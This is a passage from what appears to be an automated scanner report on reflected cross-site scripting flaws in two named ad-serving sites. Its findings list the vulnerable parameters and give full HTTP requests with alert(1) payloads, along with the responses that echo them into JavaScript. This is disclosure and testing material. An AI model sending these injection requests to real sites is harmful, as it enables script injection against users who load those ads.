GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509dca13"-alert(1)-"121437d18da HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:46 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=121863BBB2F4CF";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:46 GMT
Content-Length: 565
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175164010000 (MII-APC/1.6)

var ftGUID_124094="121863BBB2F4CF";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509dca13"-alert(1)-"121437d18da";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/12/124094/184545/js/j
...[SNIP]...

6.25. http://servedby.flashtalking.com/imp/3/15881 [ftadz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/imp/3/15881

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83c50"-alert(1)-"74ea3ccc27 was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=83c50"-alert(1)-"74ea3ccc27&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:20 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1218F3A63D70DF";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:20 GMT
Content-Length: 564
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175171010000 (MII-APC/1.6)

var ftGUID_124094="1218F3A63D70DF";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=83c50"-alert(1)-"74ea3ccc27&ftscw=&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cdn.flash
...[SNIP]...

6.26. http://servedby.flashtalking.com/imp/3/15881 [ftscw parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/imp/3/15881

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 857f8"-alert(1)-"646183f6787 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=857f8"-alert(1)-"646183f6787&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:33 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=121823E8BDA6DF";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:33 GMT
Content-Length: 565
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw061007 (MII-APC/1.6)

var ftGUID_124094="121823E8BDA6DF";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=857f8"-alert(1)-"646183f6787&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking
...[SNIP]...

6.27. http://servedby.flashtalking.com/imp/3/15881 [ftx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/imp/3/15881

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39f9c"-alert(1)-"55afaf56e4b was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=39f9c"-alert(1)-"55afaf56e4b&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:50 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1218792D86C7D1";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:42:50 GMT
Content-Length: 565
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175164010000 (MII-APC/1.6)

var ftGUID_124094="1218792D86C7D1";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=39f9c"-alert(1)-"55afaf56e4b&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http
...[SNIP]...

6.28. http://servedby.flashtalking.com/imp/3/15881 [fty parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/imp/3/15881

Issue detail

The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9762c"-alert(1)-"75177b00e03 was submitted in the fty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=9762c"-alert(1)-"75177b00e03&ftadz=&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:07 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=1218E15DFCBA8F";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:07 GMT
Cache-Control: no-cache, no-store
Content-Length: 565
pragma: no-cache
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175164010000 (MII-APC/1.6)

var ftGUID_124094="1218E15DFCBA8F";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=9762c"-alert(1)-"75177b00e03&ftadz=&ftscw=&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cd
...[SNIP]...

6.29. http://servedby.flashtalking.com/imp/3/15881 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/imp/3/15881

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b205c"-alert(1)-"e06a7be33a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509&b205c"-alert(1)-"e06a7be33a0=1 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:43:59 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=12183D9E4BB119";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:43:59 GMT
Content-Length: 568
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175171010000 (MII-APC/1.6)

var ftGUID_124094="12183D9E4BB119";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509&b205c"-alert(1)-"e06a7be33a0=1";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/xre/12/124094/184537/js
...[SNIP]...

6.30. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8424e"%3balert(1)//7487bfd2194 was submitted in the action parameter. This input was echoed as 8424e";alert(1)//7487bfd2194 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD8424e"%3balert(1)//7487bfd2194&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB10
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:30 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:30 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250";var ca="VIEWAD8424e";alert(1)//7487bfd2194";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;va
...[SNIP]...

6.31. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb019"%3balert(1)//b65de132d16 was submitted in the cwadformat parameter. This input was echoed as eb019";alert(1)//b65de132d16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250eb019"%3balert(1)//b65de132d16&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:33 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:33 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250eb019";alert(1)//b65de132d16";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var
...[SNIP]...

6.32. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e6c6"%3balert(1)//02ff7aa62ef was submitted in the cwheight parameter. This input was echoed as 9e6c6";alert(1)//02ff7aa62ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=2509e6c6"%3balert(1)//02ff7aa62ef&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP200
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 29 Apr 02011 17:42:46 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
Content-Length: 5826
Date: Tue, 03 May 2011 15:41:44 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:44 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 03-May-2011 18:28:24 GMT; Path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="503597";var cwtagid="94417";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="2509e6c6";alert(1)//02ff7aa62ef";var cads="0";var cp="503597";var ct="94417";var cf="300X250";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=do
...[SNIP]...

6.33. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8bcb"%3balert(1)//0d2ab08f98b was submitted in the cwpid parameter. This input was echoed as f8bcb";alert(1)//0d2ab08f98b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597f8bcb"%3balert(1)//0d2ab08f98b&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP118
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Sat, 30 Apr 02011 11:53:36 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
Content-Length: 5854
Date: Tue, 03 May 2011 15:41:40 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:40 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 03-May-2011 18:28:20 GMT; Path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="503597f8bcb";alert(1)//0d2ab08f98b";var cwtagid="94417";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="503597f8bcb";alert(1)//0d2ab08f98b";var ct="94417";var cf="300X250";var cn="1"
...[SNIP]...

6.34. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e73b3"%3balert(1)//a8ed0abca64 was submitted in the cwpnet parameter. This input was echoed as e73b3";alert(1)//a8ed0abca64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1e73b3"%3balert(1)//a8ed0abca64&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB10
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:46 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:46 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1e73b3";alert(1)//a8ed0abca64";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...

6.35. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb99a"%3balert(1)//7f941fa397 was submitted in the cwrun parameter. This input was echoed as eb99a";alert(1)//7f941fa397 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200eb99a"%3balert(1)//7f941fa397&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB30
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5780
Date: Tue, 03 May 2011 15:41:33 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:31 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250";var ca="VIEWAD";var cr="200eb99a";alert(1)//7f941fa397";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window
...[SNIP]...

6.36. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ee9"%3balert(1)//43dd5ee413a was submitted in the cwtagid parameter. This input was echoed as c0ee9";alert(1)//43dd5ee413a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417c0ee9"%3balert(1)//43dd5ee413a HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:47 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:47 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417c0ee9";alert(1)//43dd5ee413a";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var
...[SNIP]...

6.37. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44449"%3balert(1)//57b0f102807 was submitted in the cwwidth parameter. This input was echoed as 44449";alert(1)//57b0f102807 in the application's response.

